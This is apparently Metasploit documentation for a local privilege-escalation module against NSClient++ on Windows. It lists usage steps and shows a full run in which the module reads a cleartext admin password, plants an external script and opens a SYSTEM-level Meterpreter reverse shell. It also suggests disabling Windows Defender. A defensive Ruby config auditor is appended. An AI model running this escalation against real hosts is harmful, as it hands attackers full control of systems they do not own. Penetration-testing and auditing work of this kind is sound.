## Vulnerable Application

### Description

This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell. For this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled. You must also know where the NSClient++ config file is, as it is used to read the admin password, which is stored in clear text.

### Installation

A vulnerable version of NSClient++ can be downloaded from [here](https://nsclient.org/download/). Then you can help yourself with this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/windows/local/nscp_pe`
3. `set SESSION `
4. `set FILE ` if the NSCP config file is not `C:\Program Files\NSClient++\nsclient.ini`
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload ` to set a specific payload to send
7. `run` the module to exploit the vulnerability, gain admin access and start a shell

## Options

### FILE

Set the config file of NSClient++. If you don't know, try with the default value.

## Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as the msf payload could be spotted). See the following output:

```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                    Connection
  --  ----  ----                     -----------                                    ----------
  12        meterpreter x64/windows  DESKTOP-T5N69RR\basic_user @ DESKTOP-T5N69RR  172.18.15.143:4444 -> 172.18.15.142:64307 (172.18.15.142)

msf6 exploit(nscp_pe) > set session 12
session => 12
msf6 exploit(nscp_pe) > run
[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[+] The target is vulnerable. External scripts feature enabled !
[+] Admin password found : easypassword
[+] NSClient web interface is enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: lrawsiaajn)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Sending stage (200262 bytes) to y.y.y.y
[*] Meterpreter session 13 opened (x.x.x.x:4444 -> y.y.y.y:64309) at 2021-06-09 14:37:10 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
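The module depends on three things being true at once in `nsclient.ini`: the web interface is enabled, the external scripts feature is enabled, and the admin password sits in the file in clear text. The following Ruby script is an added example (not part of this module or of NSClient++) that audits a config file for exactly that combination, so an administrator can find hosts that expose it before anyone else does. The section and key names it looks for (`[/modules]` with `WEBServer` and `CheckExternalScripts`, and `password` under `[/settings/default]`) follow the NSClient++ config layout as I recall it and are assumptions; the embedded sample file is constructed.

```ruby
# Added example, not the module's own code: audit an nsclient.ini for the
# web-interface + external-scripts + cleartext-password combination.
# Section/key names are assumptions about the NSClient++ config layout.

# Minimal parser for the INI-style nsclient.ini: sections look like "[/path]",
# keys are "name = value", and ';' starts a comment.
def parse_nsclient_ini(text)
  sections = Hash.new { |h, k| h[k] = {} }
  current = nil
  text.each_line do |raw|
    line = raw.sub(/;.*$/, '').strip
    next if line.empty?
    if line =~ /\A\[(.+)\]\z/
      current = Regexp.last_match(1).strip.downcase
    elsif current && line.include?('=')
      key, value = line.split('=', 2).map(&:strip)
      sections[current][key.downcase] = value
    end
  end
  sections
end

# NSClient++ accepts a few spellings for "on"; treat them all as enabled.
def enabled?(value)
  %w[enabled true 1].include?(value.to_s.strip.downcase)
end

# Returns an array of findings; an empty array means the risky combination
# is absent. The last finding is the combined HIGH-severity one.
def audit_nsclient_config(text)
  cfg = parse_nsclient_ini(text)
  modules = cfg['/modules']
  web = enabled?(modules['webserver'])
  ext = enabled?(modules['checkexternalscripts'])
  password = cfg['/settings/default']['password'].to_s
  has_password = !password.empty?

  findings = []
  findings << 'web interface (WEBServer) enabled' if web
  findings << 'external scripts (CheckExternalScripts) enabled' if ext
  findings << 'admin password stored in clear text under [/settings/default]' if has_password
  if web && ext && has_password
    findings << 'HIGH: web interface + external scripts + cleartext password; ' \
                'any local user who can read this file can reach the web API as admin. ' \
                'Restrict the file ACL and disable whichever feature is not needed.'
  end
  findings
end

# Constructed sample mirroring the layout of a default install.
SAMPLE_INI = <<~INI
  ; NSClient++ configuration (constructed sample, not a real deployment)
  [/modules]
  CheckExternalScripts = enabled
  WEBServer = enabled

  [/settings/default]
  password = easypassword
INI

if __FILE__ == $PROGRAM_NAME
  path = ARGV[0] || 'C:\Program Files\NSClient++\nsclient.ini'
  text = File.exist?(path) ? File.read(path) : SAMPLE_INI
  audit_nsclient_config(text).each { |f| puts "- #{f}" }
end
```

Run it with the path to a real `nsclient.ini` as the first argument; without one it audits the embedded sample. On the sample it reports all three individual settings plus the combined HIGH finding, which is the state the `check` command above looks for. The practical fixes it points at are the ones that remove a precondition: tighten the read ACL on the config file so unprivileged accounts cannot read the password, and leave `WEBServer` or `CheckExternalScripts` disabled wherever they are not actually used.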